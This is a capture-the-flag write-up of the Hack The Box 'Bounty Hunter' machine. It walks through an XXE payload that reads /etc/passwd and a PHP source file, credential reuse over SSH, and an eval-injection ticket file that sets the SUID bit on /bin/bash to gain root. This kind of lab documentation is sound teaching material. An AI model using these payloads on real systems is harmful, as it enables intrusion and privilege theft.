> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box/htb-bounty-hunter.md).

# HTB - Bounty Hunter

## Enumeration and Foothold

### NMAP

```powershell
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Browsing to port 80 reveals a Web application.

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F5iounArxPcUAVQj9MoOQ%2Fimage.png?alt=media&amp;token=a40cfa2d-d670-4e30-88d1-f9f82f682c64" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FwLyjX71n4bWVFet7Q3DU%2Fimage.png?alt=media&amp;token=b5d7007b-55d5-412b-b59c-afab3c1a64b0" alt=""><figcaption></figcaption></figure>

there is a download option for pricing guide but nothing happens when downloading too.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FJ8grpFyWFLvSD9kyRBrM%2Fimage.png?alt=media&amp;token=2554c616-e04f-4436-aa6b-74d7f676414b" alt=""><figcaption></figcaption></figure>

contact form is static nothing happens when sending the form.

Clicking on portal redirects to this&#x20;

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FG6Yxdcr5FOB5wiR2yDbS%2Fimage.png?alt=media&amp;token=522f214e-0f8d-42be-8a79-9398447cfb46" alt=""><figcaption></figcaption></figure>

which in turn redirects to a bounty report system

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FstUPDyGtSnPQybLZjSaH%2Fimage.png?alt=media&amp;token=acbbffc7-97b7-4c3e-9e70-d5126d1f8feb" alt=""><figcaption></figcaption></figure>

I can use burpsuite to examine the requests and what is  actually going around.\
lets try to submit a report and observer the requests in the burp

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fhk6Tnhyqx82OnKiU7te6%2Fimage.png?alt=media&amp;token=816b12af-67ce-49af-aeb8-9c09481b93d2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FmR67WMJy1p5KBRcthLRC%2Fimage.png?alt=media&amp;token=188c458f-034a-4030-9b68-9f4c2ffbcf63" alt=""><figcaption></figcaption></figure>

Application sends the submitted data as XML by Base64 encoding it. could be potential vector for XXE Injection.

### XXE Injection

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FXqO9WuTYDjBiWA9SR4RA%2Fimage.png?alt=media&amp;token=2fc4ce40-75cb-4efa-afd9-1a33f5c7e907" alt=""><figcaption></figcaption></figure>

That said i can test for XXE injection.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FsezV0vaDudx5jb0XlDHK%2Fimage.png?alt=media&amp;token=a58f4d5b-cd25-4cb4-8337-8437452ae07a" alt=""><figcaption></figcaption></figure>

Click apply changes and send

nothing reflected. lets check one field at a time

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FGZssKVGeMaHvujAHdsu8%2Fimage.png?alt=media&amp;token=b8ffd1f6-baaf-4d37-a1cc-d5bcad18402c" alt=""><figcaption></figcaption></figure>

click apply and send.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FgSZA9tfOtD9t9zszjp3v%2Fimage.png?alt=media&amp;token=41465506-73f5-4ab1-8520-05944894c80a" alt=""><figcaption></figcaption></figure>

Title field is reflected which means we can use it for XXE injection.

So the application is sending XML data as XML data -> Base64 encode -> URL encode.

that said i can use it to read the SYSTEM files.

```
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<data>&example;</data>
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FGAWrGuA0RkZxHS4cfXRN%2Fimage.png?alt=media&amp;token=577ad513-653e-42e7-be56-b73f3e931445" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FdqSiXSKCLUfTaliVAof5%2Fimage.png?alt=media&amp;token=50db91c8-2250-4202-b010-0476bb069818" alt=""><figcaption></figcaption></figure>

Earlier i did a directory search and found a database file

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FYI8cQwhybOkroFC5OeK1%2Fimage.png?alt=media&amp;token=2193ebe0-6f79-43cf-8aa8-a9fea16c9558" alt=""><figcaption></figcaption></figure>

i can try looking into it.

since its a php file i can use php wrapper to read it.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FnSS5QivjshgXgKRodAxx%2Fimage.png?alt=media&amp;token=7965d9ce-938a-4aeb-9484-0c79dcf3ae3a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Ft8z5FrSNrbeRrzXnSjXO%2Fimage.png?alt=media&amp;token=befaf1ad-02fb-4f83-8a99-0232b9690f88" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FA53DKTx6gou0C0kXdSzt%2Fimage.png?alt=media&amp;token=2e95f5f3-805e-4120-a84c-09b0cbca9482" alt=""><figcaption></figcaption></figure>

i can decode the base64 encoded output.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fh8sjse5ot50zi4XjCb6F%2Fimage.png?alt=media&amp;token=0e039d46-3d26-4e1e-a0c9-dcfae833aff5" alt=""><figcaption></figcaption></figure>

Found credentials for admin. But there is no login page on the web application.

Also from the `/etc/passwd` output there is no user called admin.

```powershell
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
development:x:1000:1000:Development:/home/development:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
```

But there is a user called development who has a user directory let me try the credentials against him.

and it works

## Shell as Development

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FHxdMXNC3c1xEr1ZvZMtJ%2Fimage.png?alt=media&amp;token=760456f0-76e0-42b5-9f0a-347b3847b427" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FuiRl2jikJdfdvYd7ozXm%2Fimage.png?alt=media&amp;token=1a7e9058-2102-48f0-99ea-6b21aabad5b2" alt=""><figcaption></figcaption></figure>

There is also a file called `contract.txt`

```
development@bountyhunter:~$ cat contract.txt 
Hey team,

I'll be out of the office this week but please make sure that our contract with Skytrain Inc gets completed.

This has been our first job since the "rm -rf" incident and we can't mess this up. Whenever one of you gets on please have a look at the internal tool they sent over. There have been a handful of tickets submitted that have been failing validation and I need you to figure out why.

I set up the permissions for you to test this. Good luck.

-- John
development@bountyhunter:~$ 

```

John is talking about an internal application which has validation issues.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Ft84gsdMLknAowPK7Z5k0%2Fimage.png?alt=media&amp;token=71a9ae75-03d7-46fd-9dc9-b2ec4237fac9" alt=""><figcaption></figcaption></figure>

Development user is configured to run `ticketValidator.py` as root.

```bash
development@bountyhunter:~$ cat /opt/skytrain_inc/ticketValidator.py
#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.

def load_file(loc):
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue

        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close

main()
development@bountyhunter:~$ 

```

`eval(x.replace("**", ""))` runs `eval()` on user-controlled input that comes straight from the ticket file. Whatever in that ticket code line after the regex checks around it — gets executed as a live Python expression, not just evaluated as a number. That's a classic eval-injection vulnerability: any Python expression can go there, not just arithmetic.

The vulnerability is `eval()` on the ticket code line, reachable because `load_file` only checks the `.md` extension and `evaluate()` hands your input straight to `eval`

That said i will create a ticket that will add an SUID bit to /bin/bash upon executing.

```bash
development@bountyhunter:~$ cat > /tmp/pwn.md << 'EOF'
> # Skytrain Inc
> ## Ticket to /bin/bash
> __Ticket Code:__
> **18+__import__('os').system('chmod u+s /bin/bash')**
> EOF
```

run the code

```bash
development@bountyhunter:~$ sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
Please enter the path to the ticket file.
/tmp/pwn.md
Destination: /bin/bash
Invalid ticket.
```

Running the code says invalid ticket but the bit is already set

```bash
development@bountyhunter:~$ ls -l /bin/bash  
-rwsr-xr-x 1 root root 1183448 Jun 18  2020 /bin/bash
```

## Shell s Root

```bash
development@bountyhunter:~$ /bin/bash -p
bash-5.0# id
uid=1000(development) gid=1000(development) euid=0(root) groups=1000(development)
bash-5.0# whoami
root
bash-5.0# cd /root
bash-5.0# ls
root.txt  snap
bash-5.0# cat root.txt
d6df8dfab94d8bef30064f2e25485923
bash-5.0# 
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box/htb-bounty-hunter.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
